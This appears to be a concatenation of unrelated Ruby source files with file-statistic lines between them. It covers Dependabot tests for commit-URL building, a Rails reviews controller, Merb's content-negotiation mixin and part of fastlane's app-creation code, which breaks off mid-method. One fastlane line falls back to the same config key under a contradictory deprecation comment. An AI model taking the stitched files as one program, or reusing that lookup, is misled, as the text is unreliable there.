"joins the directory correctly" do expect(commits_url). to eq( "https://github.com/gocardless/business/commits/"\ "v1.4.0/my/directory" ) end end end end end context "with a github repo and tags with surprising names" do before do allow(builder). to receive(:fetch_dependency_tags). 
and_return( %w( business-1.4.0.beta business-21.4.0 business-2.1.4.0 business-1.4.-1 business-1.4 business-1.3.0 ) ) end it do is_expected.to eq("https://github.com/gocardless/business/"\ "commits/business-1.4") end context "for a monorepo" do let(:dependency_name) { "@pollyjs/ember" } let(:dependency_version) { "0.2.0" } let(:dependency_previous_version) { "0.0.1" } let(:source) do Dependabot::Source.new( provider: "github", repo: "netflix/pollyjs", directory: "packages/ember" ) end before do allow(builder). to receive(:fetch_dependency_tags). and_return( %w( @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] ) ) end before do allow(builder). to receive(:reliable_source_directory?). and_return(true) end it do is_expected.to eq("https://github.com/netflix/pollyjs/"\ "commits/@pollyjs/[email protected]/packages/ember") end context "without a previous version" do let(:dependency_previous_version) { "0.0.3" } it do is_expected.to eq("https://github.com/netflix/pollyjs/"\ "commits/@pollyjs/[email protected]/packages/ember") end end context "without a non-correct previous version" do let(:dependency_previous_version) { "master" } it do is_expected.to eq("https://github.com/netflix/pollyjs/"\ "commits/@pollyjs/[email protected]/packages/ember") end end end end context "with a github repo and tags with no prefix" do before do allow(builder). to receive(:fetch_dependency_tags). and_return(%w(1.5.0 1.4.0 1.3.0)) end it do is_expected.to eq("https://github.com/gocardless/business/"\ "commits/1.4.0") end end context "with a github repo and no tags found" do let(:upload_pack_fixture) { "no_tags" } it do is_expected.to eq("https://github.com/gocardless/business/commits") end end context "with a dependency that has a git source" do let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business" } }] end let(:dependency_requirements) { dependency_previous_requirements } let(:dependency_version) { "cd8274d15fa3ae2ab983129fb037999f264ba9a7" } let(:dependency_previous_version) do "7638417db6d59f3c431d3e1f261cc637155684cd" end it "uses the SHA-1 hashes to build the compare URL" do expect(builder.commits_url). 
to eq( "https://github.com/gocardless/business/compare/"\ "7638417db6d59f3c431d3e1f261cc637155684cd..."\ "cd8274d15fa3ae2ab983129fb037999f264ba9a7" ) end context "with refs and numeric versions" do let(:dependency_version) { "1.4.0" } let(:dependency_previous_version) { "1.3.0" } let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business", ref: "v1.3.0" } }] end let(:dependency_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business", ref: "v1.4.0" } }] end it "uses the refs to build the compare URL" do expect(builder.commits_url). to eq( "https://github.com/gocardless/business/compare/v1.3.0...v1.4.0" ) end end context "without a previous version" do let(:dependency_previous_version) { nil } it "uses the new SHA1 hash to build the compare URL" do expect(builder.commits_url). to eq("https://github.com/gocardless/business/commits/"\ "cd8274d15fa3ae2ab983129fb037999f264ba9a7") end end context "for the previous requirement only" do let(:dependency_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: nil }] end let(:dependency_version) { "1.4.0" } let(:upload_pack_fixture) { "business" } it do is_expected. to eq("https://github.com/gocardless/business/compare/"\ "7638417db6d59f3c431d3e1f261cc637155684cd...v1.4.0") end context "without credentials" do let(:credentials) do [{ "type" => "git_source", "host" => "bitbucket.org", "username" => "greysteil", "password" => "secret_token" }] end context "when authentication fails" do before do stub_request(:get, service_pack_url).to_return(status: 404) end it do is_expected. to eq("https://github.com/gocardless/business/commits") end end context "when authentication succeeds" do let(:upload_pack_fixture) { "business" } it do is_expected. to eq("https://github.com/gocardless/business/compare/"\ "7638417db6d59f3c431d3e1f261cc637155684cd...v1.4.0") end end end context "without a previous version" do let(:dependency_previous_version) { nil } it "uses the reference specified" do expect(builder.commits_url). to eq("https://github.com/gocardless/business/commits/v1.4.0") end context "but with a previously specified reference" do let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://github.com/gocardless/business", ref: "7638417" } }] end it "uses the reference specified" do # It would be nice to pick up the previously specified reference, # but we'd have to do a `pinned?` check to do so reliably expect(builder.commits_url). 
to eq("https://github.com/gocardless/business/commits/v1.4.0") end end end end end context "with a gitlab repo" do let(:service_pack_url) do "https://gitlab.com/org/business.git/info/refs"\ "?service=git-upload-pack" end let(:source) do Dependabot::Source.new( provider: "gitlab", repo: "org/#{dependency_name}" ) end context "with old and new tags" do let(:dependency_previous_version) { "1.3.0" } it "gets the right URL" do is_expected.to eq("https://gitlab.com/org/business/"\ "compare/v1.3.0...v1.4.0") end end context "with only a new tag" do let(:dependency_previous_version) { "0.3.0" } it "gets the right URL" do is_expected.to eq("https://gitlab.com/org/business/commits/v1.4.0") end end context "no tags" do let(:dependency_previous_version) { "0.3.0" } let(:dependency_version) { "0.5.0" } it "gets the right URL" do is_expected.to eq("https://gitlab.com/org/business/commits/master") end end end context "with a bitbucket repo" do let(:service_pack_url) do "https://bitbucket.org/org/business.git/info/refs"\ "?service=git-upload-pack" end let(:source) do Dependabot::Source.new( provider: "bitbucket", repo: "org/#{dependency_name}" ) end context "with credentials" do let(:credentials) do [{ "type" => "git_source", "host" => "github.com", "username" => "x-access-token", "password" => "token" }, { "type" => "git_source", "host" => "bitbucket.org", "username" => "greysteil", "password" => "secret_token" }] end it "uses the credentials" do builder.commits_url expect(WebMock). to have_requested(:get, service_pack_url). with(basic_auth: %w(greysteil secret_token)) end end context "with old and new tags" do let(:dependency_previous_version) { "1.3.0" } it "gets the right URL" do is_expected.to eq("https://bitbucket.org/org/business/"\ "branches/compare/v1.4.0..v1.3.0") end end context "with only a new tag" do let(:dependency_previous_version) { "0.3.0" } it "gets the right URL" do is_expected. to eq("https://bitbucket.org/org/business/commits/tag/v1.4.0") end end context "no tags" do let(:dependency_previous_version) { "0.3.0" } let(:dependency_version) { "0.5.0" } it "gets the right URL" do is_expected.to eq("https://bitbucket.org/org/business/commits") end end context "no previous version" do let(:dependency_previous_version) { nil } let(:dependency_version) { "0.5.0" } it "gets the right URL" do is_expected.to eq("https://bitbucket.org/org/business/commits") end end end context "without a recognised source" do let(:source) { nil } it { is_expected.to be_nil } end end describe "#commits" do subject { builder.commits } context "with old and new tags" do let(:dependency_previous_version) { "1.3.0" } context "with a github repo" do before do stub_request( :get, "https://api.github.com/repos/gocardless/business/compare/"\ "v1.3.0...v1.4.0" ).with(headers: { "Authorization" => "token token" }). 
to_return( status: 200, body: fixture("github", "business_compare_commits.json"), headers: { "Content-Type" => "application/json" } ) end it "returns an array of commits" do is_expected.to match_array( [ { message: "Remove SEPA calendar (replaced by TARGET)", sha: "d2eb29beda934c14220146c82f830de2edd63a25", html_url: "https://github.com/gocardless/business/commit/"\ "d2eb29beda934c14220146c82f830de2edd63a25" }, { message: "Merge pull request #8 from gocardless/"\ "rename-sepa-to-ecb\n\nRemove SEPA calendar "\ "(replaced by TARGET)", sha: "a5970daf0b824e4c3974e57474b6cf9e39a11d0f", html_url: "https://github.com/gocardless/business/commit/"\ "a5970daf0b824e4c3974e57474b6cf9e39a11d0f" }, { message: "Spacing: https://github.com/my/repo/pull/5", sha: "0bfb8c3f0d2701abf9248185beeb8adf643374f6", html_url: "https://github.com/gocardless/business/commit/"\ "0bfb8c3f0d2701abf9248185beeb8adf643374f6" }, { message: "Allow custom calendars", sha: "1c72c35ff2aa9d7ce0403d7fd4aa010d94723076", html_url: "https://github.com/gocardless/business/commit/"\ "1c72c35ff2aa9d7ce0403d7fd4aa010d94723076" }, { message: "[Fix #9] Allow custom calendars", sha: "7abe4c2dc0161904c40c221a48999d12995fbea7", html_url: "https://github.com/gocardless/business/commit/"\ "7abe4c2dc0161904c40c221a48999d12995fbea7" }, { message: "Bump version to v1.4.0", sha: "26f4887ec647493f044836363537e329d9d213aa", html_url: "https://github.com/gocardless/business/commit/"\ "26f4887ec647493f044836363537e329d9d213aa" } ] ) end context "that 404s" do before do response = { message: "No common ancestor between v4.7.0 and 5.0.8." }.to_json stub_request( :get, "https://api.github.com/repos/gocardless/business/compare/"\ "v1.3.0...v1.4.0" ).with(headers: { "Authorization" => "token token" }). to_return( status: 404, body: response, headers: { "Content-Type" => "application/json" } ) end it { is_expected.to eq([]) } end context "for a monorepo" do let(:dependency_name) { "@pollyjs/ember" } let(:dependency_version) { "0.2.0" } let(:dependency_previous_version) { "0.1.0" } let(:source) do Dependabot::Source.new( provider: "github", repo: "netflix/pollyjs", directory: "packages/@pollyjs/ember" ) end before do allow(builder). to receive(:fetch_dependency_tags). and_return( %w( @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] @pollyjs/[email protected] ) ) end before do allow(builder). to receive(:reliable_source_directory?). and_return(true) end before do stub_request( :get, "https://api.github.com/repos/netflix/pollyjs/commits?"\ "path=packages/@pollyjs/ember&sha=@pollyjs/[email protected]" ).with(headers: { "Authorization" => "token token" }). to_return( status: 200, body: fixture("github", "commits-pollyjs-ember-0.2.0.json"), headers: { "Content-Type" => "application/json" } ) stub_request( :get, "https://api.github.com/repos/netflix/pollyjs/commits?"\ "path=packages/@pollyjs/ember&sha=@pollyjs/[email protected]" ).with(headers: { "Authorization" => "token token" }). 
to_return( status: 200, body: fixture("github", "commits-pollyjs-ember-0.1.0.json"), headers: { "Content-Type" => "application/json" } ) end it "returns an array of commits relevant to the given path" do is_expected.to match_array( [ { message: "feat: Custom persister support\n\n"\ "* feat: Custom persister support\r\n\r\n"\ "* Create a @pollyjs/persister package\r\n"\ "* Move out shared utils into their own "\ "@pollyjs/utils package\r\n"\ "* Add support to register a custom persister "\ "(same way as an adapter)\r\n"\ "* Add more tests\r\n\r\n"\ "* docs: Custom adapter & persister docs\r\n\r\n"\ "* test: Add custom persister test", sha: "8bb313cc08716b80076c6f68d056396ce4b4d282", html_url: "https://github.com/Netflix/pollyjs/commit/"\ "8bb313cc08716b80076c6f68d056396ce4b4d282" }, { message: "chore: Publish\n\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]\n"\ " - @pollyjs/[email protected]", sha: "ebf6474d0008e9e76249a78473263894dd0668dc", html_url: "https://github.com/Netflix/pollyjs/commit/"\ "ebf6474d0008e9e76249a78473263894dd0668dc" } ] ) end end end context "with a bitbucket repo" do let(:bitbucket_compare_url) do "https://api.bitbucket.org/2.0/repositories/org/business/commits/"\ "?exclude=v1.3.0&include=v1.4.0" end let(:bitbucket_compare) do fixture("bitbucket", "business_compare_commits.json") end let(:source) do Dependabot::Source.new( provider: "bitbucket", repo: "org/#{dependency_name}" ) end let(:service_pack_url) do "https://bitbucket.org/org/business.git/info/refs"\ "?service=git-upload-pack" end before do stub_request(:get, bitbucket_compare_url). to_return(status: 200, body: bitbucket_compare, headers: { "Content-Type" => "application/json" }) end it "returns an array of commits" do is_expected.to match_array( [ { message: "Added signature for changeset f275e318641f", sha: "deae742eacfa985bd20f47a12a8fee6ce2e0447c", html_url: "https://bitbucket.org/ged/ruby-pg/commits/"\ "deae742eacfa985bd20f47a12a8fee6ce2e0447c" }, { message: "Eliminate use of deprecated PGError constant from "\ "specs", sha: "f275e318641f185b8a15a2220e7c189b1769f84c", html_url: "https://bitbucket.org/ged/ruby-pg/commits/"\ "f275e318641f185b8a15a2220e7c189b1769f84c" } ] ) end end context "with a gitlab repo" do let(:gitlab_compare_url) do "https://gitlab.com/api/v4/projects/org%2Fbusiness/repository/"\ "compare?from=v1.3.0&to=v1.4.0" end let(:service_pack_url) do "https://gitlab.com/org/business.git/info/refs"\ "?service=git-upload-pack" end let(:gitlab_compare) do fixture("gitlab", "business_compare_commits.json") end let(:source) do Dependabot::Source.new( provider: "gitlab", repo: "org/#{dependency_name}" ) end before do stub_request(:get, gitlab_compare_url). 
to_return(status: 200, body: gitlab_compare, headers: { "Content-Type" => "application/json" }) end it "returns an array of commits" do is_expected.to match_array( [ { message: "Add find command\n", sha: "8d7d08fb9a7a439b3e6a1e6a1a34cbdb4273de87", html_url: "https://gitlab.com/org/business/commit/"\ "8d7d08fb9a7a439b3e6a1e6a1a34cbdb4273de87" }, { message: "...\n", sha: "4ac81646582f254b3e86653b8fcd5eda6d8bb45d", html_url: "https://gitlab.com/org/business/commit/"\ "4ac81646582f254b3e86653b8fcd5eda6d8bb45d" }, { message: "MP version\n", sha: "4e5081f867631f10d8a29dc6853a052f52241fab", html_url: "https://gitlab.com/org/business/commit/"\ "4e5081f867631f10d8a29dc6853a052f52241fab" }, { message: "BUG: added 'force_consistent' keyword argument "\ "with default True\n\nThe bug fix is necessayry to "\ "pass the test turbomole_h3o2m.py.\n", sha: "e718899ddcdc666311d08497401199e126428163", html_url: "https://gitlab.com/org/business/commit/"\ "e718899ddcdc666311d08497401199e126428163" } ] ) end context "with a dependency that has a git source" do let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: { type: "git", url: "https://gitlab.com/orgs/#{dependency_name}" } }] end let(:dependency_requirements) { dependency_previous_requirements } let(:dependency_version) do "cd8274d15fa3ae2ab983129fb037999f264ba9a7" end let(:dependency_previous_version) do "7638417db6d59f3c431d3e1f261cc637155684cd" end context "that 404s" do before do response = { message: "404 Project Not Found" }.to_json gitlab_compare_url = "https://gitlab.com/api/v4/projects/"\ "org%2Fbusiness/repository/compare"\ "?from=7638417db6d59f3c431d3e1f261cc637155684cd"\ "&to=cd8274d15fa3ae2ab983129fb037999f264ba9a7" stub_request(:get, gitlab_compare_url). to_return(status: 404, body: response, headers: { "Content-Type" => "application/json" }) end it { is_expected.to eq([]) } end end end end context "with only a new tag" do let(:dependency_previous_version) { "0.1.0" } let(:upload_pack_fixture) { "business" } it { is_expected.to eq([]) } end context "with no tags found" do let(:upload_pack_fixture) { "no_tags" } it { is_expected.to eq([]) } end context "without a recognised source" do let(:source) { nil } it { is_expected.to eq([]) } end end end
32.530201
79
0.512207
ac73836df316c7519b61030f87dbcee92674197a
382
module Starling
  module Resources
    # A resource representing a Contact returned from the Contacts API
    class ContactResource < BaseResource
      # @return [String] the Starling internal ID of the contact
      def id
        parsed_data['id']
      end

      # @return [String] the name of the contact
      def name
        parsed_data['name']
      end
    end
  end
end
22.470588
70
0.646597
79ee9d158aaaed9c8f22a603c53cea6aedc4ad06
1,425
require "administrate/base_dashboard" class PilotRegionDashboard < BaseDashboard # ATTRIBUTE_TYPES # a hash that describes the type of each of the model's fields. # # Each different type represents an Administrate::Field object, # which determines how the attribute is displayed # on pages throughout the dashboard. ATTRIBUTE_TYPES = { administrative_division: Field::BelongsTo, id: Field::Number, created_at: DateField, updated_at: DateField, }.freeze # COLLECTION_ATTRIBUTES # an array of attributes that will be displayed on the model's index page. # # By default, it's limited to four items to reduce clutter on index pages. # Feel free to add, remove, or rearrange items. COLLECTION_ATTRIBUTES = [ :administrative_division, :id, :created_at, ].freeze # SHOW_PAGE_ATTRIBUTES # an array of attributes that will be displayed on the model's show page. SHOW_PAGE_ATTRIBUTES = [ :id, :administrative_division, :created_at, :updated_at, ].freeze # FORM_ATTRIBUTES # an array of attributes that will be displayed # on the model's form (`new` and `edit`) pages. FORM_ATTRIBUTES = [ :administrative_division, ].freeze # Overwrite this method to customize how pilot regions are displayed # across all pages of the admin dashboard. # # def display_resource(pilot_region) # "PilotRegion ##{pilot_region.id}" # end end
27.941176
76
0.719298
08b2adc7a7593307a6071a353a76d9ff82acf731
923
class ReviewsController < ApplicationController
  before_action :set_recipe

  def new
    @review = Review.new
  end

  def create
    if user_signed_in?
      @review = Review.new(review_params)
      @review.recipe = Recipe.find_by(id: params[:recipe_id])
      @review.user = current_user
      if @review.save
        @recipe = @review.recipe
        respond_to do |format|
          format.html { redirect_to @recipe }
          format.js { } # controller method sends back response as js
        end
      else
        redirect_back(fallback_location: root_path)
      end
    else
      redirect_to new_user_session_path, alert: "You must be logged in to leave a review"
    end
  end

  private

  def set_recipe
    # Guard on the incoming param; @recipe is not yet set when this filter runs.
    if params[:recipe_id].present?
      @recipe = Recipe.find(params[:recipe_id])
    end
  end

  def review_params
    params.require(:review).permit(:difficulty, :description, :reviewer, :recipe_id)
  end
end
23.666667
89
0.661972
395d882e25adc3e8ed41401fb62326c1fd8b7f4a
15,629
require 'enumerator' require 'merb-core/controller/mime' module Merb # The ResponderMixin adds methods that help you manage what # formats your controllers have available, determine what format(s) # the client requested and is capable of handling, and perform # content negotiation to pick the proper content format to # deliver. # # If you hear someone say "Use provides" they're talking about the # Responder. If you hear someone ask "What happened to respond_to?" # it was replaced by provides and the other Responder methods. # # == A simple example # # The best way to understand how all of these pieces fit together is # with an example. Here's a simple web-service ready resource that # provides a list of all the widgets we know about. The widget list is # available in 3 formats: :html (the default), plus :xml and :text. # # class Widgets < Application # provides :html # This is the default, but you can # # be explicit if you like. # provides :xml, :text # # def index # @widgets = Widget.fetch # render @widgets # end # end # # Let's look at some example requests for this list of widgets. We'll # assume they're all GET requests, but that's only to make the examples # easier; this works for the full set of RESTful methods. # # 1. The simplest case, /widgets.html # Since the request includes a specific format (.html) we know # what format to return. Since :html is in our list of provided # formats, that's what we'll return. +render+ will look # for an index.html.erb (or another template format # like index.html.mab; see the documentation on Template engines) # # 2. Almost as simple, /widgets.xml # This is very similar. They want :xml, we have :xml, so # that's what they get. If +render+ doesn't find an # index.xml.builder or similar template, it will call +to_xml+ # on @widgets. This may or may not do something useful, but you can # see how it works. # # 3. A browser request for /widgets # This time the URL doesn't say what format is being requested, so # we'll look to the HTTP Accept: header. If it's '*/*' (anything), # we'll use the first format on our list, :html by default. # # If it parses to a list of accepted formats, we'll look through # them, in order, until we find one we have available. If we find # one, we'll use that. Otherwise, we can't fulfill the request: # they asked for a format we don't have. So we raise # 406: Not Acceptable. # # == A more complex example # # Sometimes you don't have the same code to handle each available # format. Sometimes you need to load different data to serve # /widgets.xml versus /widgets.txt. In that case, you can use # +content_type+ to determine what format will be delivered. # # class Widgets < Application # def action1 # if content_type == :text # Widget.load_text_formatted(params[:id]) # else # render # end # end # # def action2 # case content_type # when :html # handle_html() # when :xml # handle_xml() # when :text # handle_text() # else # render # end # end # end # # You can do any standard Ruby flow control using +content_type+. If # you don't call it yourself, it will be called (triggering content # negotiation) by +render+. # # Once +content_type+ has been called, the output format is frozen, # and none of the provides methods can be used. 
module ResponderMixin TYPES = {} class ContentTypeAlreadySet < StandardError; end # ==== Parameters # base<Module>:: The module that ResponderMixin was mixed into def self.included(base) # :nodoc: base.extend(ClassMethods) base.class_eval do class_inheritable_accessor :class_provided_formats self.class_provided_formats = [] end base.reset_provides end module ClassMethods # Adds symbols representing formats to the controller's default list of # provided_formats. These will apply to every action in the controller, # unless modified in the action. If the last argument is a Hash or an # Array, these are regarded as arguments to pass to the to_<mime_type> # method as needed. # # ==== Parameters # *formats<Symbol>:: # A list of mime-types that the controller should provide. # # ==== Returns # Array[Symbol]:: List of formats passed in. # # ==== Examples # provides :html, :xml #--- # @public def provides(*formats) formats.each do |fmt| self.class_provided_formats << fmt unless class_provided_formats.include?(fmt) end end # This class should only provide the formats listed here, despite any # other definitions previously or in superclasses. # # ==== Parameters # *formats<Symbol>:: Registered mime-types. # # ==== Returns # Array[Symbol]:: List of formats passed in. # #--- # @public def only_provides(*formats) clear_provides provides(*formats) end # This class should not provide any of this list of formats, despite any. # other definitions previously or in superclasses. # # ==== Parameters # *formats<Symbol>:: Registered mime-types. # # ==== Returns # Array[Symbol]:: # List of formats that remain after removing the ones not to provide. # #--- # @public def does_not_provide(*formats) self.class_provided_formats -= formats end # Clear the list of provides. # # ==== Returns # Array:: An empty Array. def clear_provides self.class_provided_formats.clear end # Reset the list of provides to include only :html. # # ==== Returns # Array[Symbol]:: [:html]. def reset_provides only_provides(:html) end end # ==== Returns # Array[Symbol]:: # The current list of formats provided for this instance of the # controller. It starts with what has been set in the controller (or # :html by default) but can be modifed on a per-action basis. def _provided_formats @_provided_formats ||= class_provided_formats.dup end # Sets the provided formats for this action. Usually, you would use a # combination of provides, only_provides and does_not_provide to manage # this, but you can set it directly. # # ==== Parameters # *formats<Symbol>:: A list of formats to be passed to provides. # # ==== Raises # Merb::ResponderMixin::ContentTypeAlreadySet:: # Content negotiation already occured, and the content_type is set. # # ==== Returns # Array[Symbol]:: List of formats passed in. def _set_provided_formats(*formats) if @_content_type raise ContentTypeAlreadySet, "Cannot modify provided_formats because content_type has already been set" end @_provided_formats = [] provides(*formats) end alias :_provided_formats= :_set_provided_formats # Adds formats to the list of provided formats for this particular request. # Usually used to add formats to a single action. See also the # controller-level provides that affects all actions in a controller. # # ==== Parameters # *formats<Symbol>:: # A list of formats to add to the per-action list of provided formats. # # ==== Raises # Merb::ResponderMixin::ContentTypeAlreadySet:: # Content negotiation already occured, and the content_type is set. # # ==== Returns # Array[Symbol]:: List of formats passed in. 
# #--- # @public def provides(*formats) if @_content_type raise ContentTypeAlreadySet, "Cannot modify provided_formats because content_type has already been set" end formats.each do |fmt| _provided_formats << fmt unless _provided_formats.include?(fmt) end end # Sets list of provided formats for this particular request. Usually used # to limit formats to a single action. See also the controller-level # only_provides that affects all actions in a controller. # # ==== Parameters # *formats<Symbol>:: # A list of formats to use as the per-action list of provided formats. # # ==== Returns # Array[Symbol]:: List of formats passed in. # #--- # @public def only_provides(*formats) _set_provided_formats(*formats) end # Removes formats from the list of provided formats for this particular # request. Usually used to remove formats from a single action. See # also the controller-level does_not_provide that affects all actions in a # controller. # # ==== Parameters # *formats<Symbol>:: Registered mime-type # # ==== Returns # Array[Symbol]:: # List of formats that remain after removing the ones not to provide. # #--- # @public def does_not_provide(*formats) formats.flatten! self._provided_formats -= formats end # Do the content negotiation: # 1. if params[:format] is there, and provided, use it # 2. Parse the Accept header # 3. If it's */*, use the first provided format # 4. Look for one that is provided, in order of request # 5. Raise 406 if none found def _perform_content_negotiation # :nodoc: raise Merb::ControllerExceptions::NotAcceptable if _provided_formats.empty? if (fmt = params[:format]) && !fmt.empty? accepts = [fmt.to_sym] else accepts = Responder.parse(request.accept).map {|t| t.to_sym}.compact end specifics = accepts & _provided_formats return specifics.first unless specifics.length == 0 return _provided_formats.first if accepts.include? :all raise Merb::ControllerExceptions::NotAcceptable end # Returns the output format for this request, based on the # provided formats, <tt>params[:format]</tt> and the client's HTTP # Accept header. # # The first time this is called, it triggers content negotiation # and caches the value. Once you call +content_type+ you can # not set or change the list of provided formats. # # Called automatically by +render+, so you should only call it if # you need the value, not to trigger content negotiation. # # ==== Parameters # fmt<String>:: # An optional format to use instead of performing content negotiation. # This can be used to pass in the values of opts[:format] from the # render function to short-circuit content-negotiation when it's not # necessary. This optional parameter should not be considered part # of the public API. # # ==== Returns # Symbol:: The content-type that will be used for this controller. # #--- # @public def content_type(fmt = nil) self.content_type = (fmt || _perform_content_negotiation) unless @_content_type @_content_type end # Sets the content type of the current response to a value based on # a passed in key. The Content-Type header will be set to the first # registered header for the mime-type. # # ==== Parameters # type<Symbol>:: The content type. # # ==== Raises # ArgumentError:: type is not in the list of registered mime-types. # # ==== Returns # Symbol:: The content-type that was passed in. 
# #--- # @semipublic def content_type=(type) unless Merb.available_mime_types.has_key?(type) raise Merb::ControllerExceptions::NotAcceptable.new("Unknown content_type for response: #{type}") end headers['Content-Type'] = Merb.available_mime_types[type][:request_headers].first @_content_type = type end end class Responder protected # Parses the raw accept header into an array of sorted AcceptType objects. # # ==== Parameters # accept_header<~to_s>:: The raw accept header. # # ==== Returns # Array[AcceptType]:: The accepted types. def self.parse(accept_header) list = accept_header.to_s.split(/,/).enum_for(:each_with_index).map do |entry,index| AcceptType.new(entry,index += 1) end.sort.uniq # firefox (and possibly other browsers) send broken default accept headers. # fix them up by sorting alternate xml forms (namely application/xhtml+xml) # ahead of pure xml types (application/xml,text/xml). if app_xml = list.detect{|e| e.super_range == 'application/xml'} list.select{|e| e.to_s =~ /\+xml/}.each { |acc_type| list[list.index(acc_type)],list[list.index(app_xml)] = list[list.index(app_xml)],list[list.index(acc_type)] } end list end end class AcceptType attr_reader :media_range, :quality, :index, :type, :sub_type # ==== Parameters # entry<String>:: The accept type pattern # index<Fixnum>:: # The index used for sorting accept types. A lower value indicates higher # priority. def initialize(entry,index) @index = index @media_range, quality = entry.split(/;\s*q=/).map{|a| a.strip } @type, @sub_type = @media_range.split(/\//) quality ||= 0.0 if @media_range == '*/*' @quality = ((quality || 1.0).to_f * 100).to_i end # Compares two accept types for sorting purposes. # # ==== Parameters # entry<AcceptType>:: The accept type to compare. # # ==== Returns # Fixnum:: # -1, 0 or 1, depending on whether entry has a lower, equal or higher # priority than the accept type being compared. def <=>(entry) c = entry.quality <=> quality c = index <=> entry.index if c == 0 c end # ==== Parameters # entry<AcceptType>:: The accept type to compare. # # ==== Returns # Boolean:: # True if the accept types are equal, i.e. if the synonyms for this # accept type includes the entry media range. def eql?(entry) synonyms.include?(entry.media_range) end # An alias for eql?. def ==(entry); eql?(entry); end # ==== Returns # Fixnum:: A hash based on the super range. def hash; super_range.hash; end # ==== Returns # Array[String]:: # All Accept header values, such as "text/html", that match this type. def synonyms @syns ||= Merb.available_mime_types.values.map do |e| e[:request_headers] if e[:request_headers].include?(@media_range) end.compact.flatten end # ==== Returns # String:: # The primary media range for this accept type, i.e. either the first # synonym or, if none exist, the media range. def super_range synonyms.first || @media_range end # ==== Returns # Symbol: The type as a symbol, e.g. :html. def to_sym Merb.available_mime_types.select{|k,v| v[:request_headers] == synonyms || v[:request_headers][0] == synonyms[0]}.flatten.first end # ==== Returns # String:: The accept type as a string, i.e. the media range. def to_s @media_range end end end
33.610753
111
0.627935
ed07c88e081a995a559473116e93e3bd0db078c9
4,958
require 'spaceship'

require_relative 'module'

module Produce
  class DeveloperCenter
    SERVICE_ON = "on"
    SERVICE_OFF = "off"
    SERVICE_COMPLETE = "complete"
    SERVICE_UNLESS_OPEN = "unlessopen"
    SERVICE_UNTIL_FIRST_LAUNCH = "untilfirstauth"
    SERVICE_LEGACY = "legacy"
    SERVICE_CLOUDKIT = "cloudkit"

    ALLOWED_SERVICES = {
      app_group: [SERVICE_ON, SERVICE_OFF],
      apple_pay: [SERVICE_ON, SERVICE_OFF],
      associated_domains: [SERVICE_ON, SERVICE_OFF],
      data_protection: [
        SERVICE_COMPLETE,
        SERVICE_UNLESS_OPEN,
        SERVICE_UNTIL_FIRST_LAUNCH
      ],
      game_center: [SERVICE_ON, SERVICE_OFF],
      health_kit: [SERVICE_ON, SERVICE_OFF],
      home_kit: [SERVICE_ON, SERVICE_OFF],
      wireless_accessory: [SERVICE_ON, SERVICE_OFF],
      icloud: [SERVICE_LEGACY, SERVICE_CLOUDKIT],
      in_app_purchase: [SERVICE_ON, SERVICE_OFF],
      inter_app_audio: [SERVICE_ON, SERVICE_OFF],
      passbook: [SERVICE_ON, SERVICE_OFF],
      push_notification: [SERVICE_ON, SERVICE_OFF],
      siri_kit: [SERVICE_ON, SERVICE_OFF],
      vpn_configuration: [SERVICE_ON, SERVICE_OFF],
      network_extension: [SERVICE_ON, SERVICE_OFF],
      hotspot: [SERVICE_ON, SERVICE_OFF],
      multipath: [SERVICE_ON, SERVICE_OFF],
      nfc_tag_reading: [SERVICE_ON, SERVICE_OFF]
    }

    def run
      login
      create_new_app
    end

    def create_new_app
      ENV["CREATED_NEW_APP_ID"] = Time.now.to_i.to_s

      if app_exists?
        UI.success("[DevCenter] App '#{Produce.config[:app_identifier]}' already exists, nothing to do on the Dev Center")
        ENV["CREATED_NEW_APP_ID"] = nil
        # Nothing to do here
      else
        app_name = Produce.config[:app_name]
        UI.message("Creating new app '#{app_name}' on the Apple Dev Center")

        app = Spaceship.app.create!(bundle_id: app_identifier,
                                    name: app_name,
                                    enable_services: enable_services,
                                    mac: Produce.config[:platform] == "osx")

        if app.name != Produce.config[:app_name]
          UI.important("Your app name includes non-ASCII characters, which are not supported by the Apple Developer Portal.")
          UI.important("To fix this a unique (internal) name '#{app.name}' has been created for you. Your app's real name '#{Produce.config[:app_name]}'")
          UI.important("will still show up correctly on iTunes Connect and the App Store.")
        end

        UI.message("Created app #{app.app_id}")

        UI.crash!("Something went wrong when creating the new app - it's not listed in the apps list") unless app_exists?

        ENV["CREATED_NEW_APP_ID"] = Time.now.to_i.to_s

        UI.success("Finished creating new app '#{app_name}' on the Dev Center")
      end

      return true
    end

    def enable_services
      app_service = Spaceship.app_service
      enabled_clean_options = {}
      # "enable_services" was deprecated in favor of "enable_services"
      config_enabled_services = Produce.config[:enable_services] || Produce.config[:enable_services]
      config_enabled_services.each do |k, v|
        if k.to_sym == :data_protection
          case v
          when SERVICE_COMPLETE
            enabled_clean_options[app_service.data_protection.complete.service_id] = app_service.data_protection.complete
          when SERVICE_UNLESS_OPEN
            enabled_clean_options[app_service.data_protection.unlessopen.service_id] = app_service.data_protection.unlessopen
          when SERVICE_UNTIL_FIRST_LAUNCH
